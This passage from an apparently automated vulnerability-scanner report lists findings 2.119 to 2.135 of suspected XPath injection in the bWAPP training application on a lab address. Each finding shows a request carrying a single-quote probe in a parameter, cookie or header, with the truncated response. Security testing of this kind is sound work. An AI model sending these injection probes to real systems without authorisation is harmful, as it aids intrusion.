Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: DENY
Connection: close
Content-Type: text/html
Content-Length: 13404

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.119. http://192.168.52.147/bWAPP/clickjacking.php [security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:17:05 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13401

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.120. http://192.168.52.147/bWAPP/commandi.php [bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/commandi.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/commandi.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/commandi.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:18:00 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.121. http://192.168.52.147/bWAPP/commandi.php [form_bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/commandi.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/commandi.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/commandi.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:18:11 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.122. http://192.168.52.147/bWAPP/commandi.php [form_security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/commandi.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/commandi.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/commandi.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:18:05 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12930

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.123. http://192.168.52.147/bWAPP/commandi.php [name of an arbitrarily supplied body parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/commandi.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/commandi.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/commandi.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1

bug=1&form_bug=submit&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:40:59 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.124. http://192.168.52.147/bWAPP/commandi.php [security_level cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/commandi.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/commandi.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/commandi.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:26:32 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.125. http://192.168.52.147/bWAPP/commandi.php [security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/commandi.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/commandi.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/commandi.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:24:45 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12927

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.126. http://192.168.52.147/bWAPP/login.php [PHPSESSID cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/login.php

Issue detail

The PHPSESSID cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the PHPSESSID cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/login.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/login.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 51
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119'
Connection: close

login=bee&password=bug&security_level=0&form=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 05:04:38 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.127. http://192.168.52.147/bWAPP/login.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/login.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/login.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://www.google.com/search?hl=en&q='
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 51
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119
Connection: close

login=bee&password=bug&security_level=0&form=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 05:05:55 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.128. http://192.168.52.147/bWAPP/login.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/login.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/login.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/login.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 51
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119
Connection: close

login=bee&password=bug&security_level=0&form=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 05:05:39 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.129. http://192.168.52.147/bWAPP/login.php [form parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/login.php

Issue detail

The form parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/login.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/login.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 51
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119
Connection: close

login=bee&password=bug&security_level=0&form=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 05:04:17 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.130. http://192.168.52.147/bWAPP/login.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/login.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/login.php?1'=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/login.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 51
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119
Connection: close

login=bee&password=bug&security_level=0&form=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 05:05:03 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.131. http://192.168.52.147/bWAPP/login.php [name of an arbitrarily supplied body parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/login.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/login.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/login.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 55
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119
Connection: close

login=bee&password=bug&security_level=0&form=submit&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 05:04:49 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.132. http://192.168.52.147/bWAPP/login.php [security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/login.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/login.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/login.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 51
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119
Connection: close

login=bee&password=bug&security_level=0'&form=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 05:03:59 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.133. http://192.168.52.147/bWAPP/sqli_1.php [Base64-decoded value of the secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:19 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.134. http://192.168.52.147/bWAPP/sqli_1.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:16:06 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.135. http://192.168.52.147/bWAPP/sqli_1.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:58 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
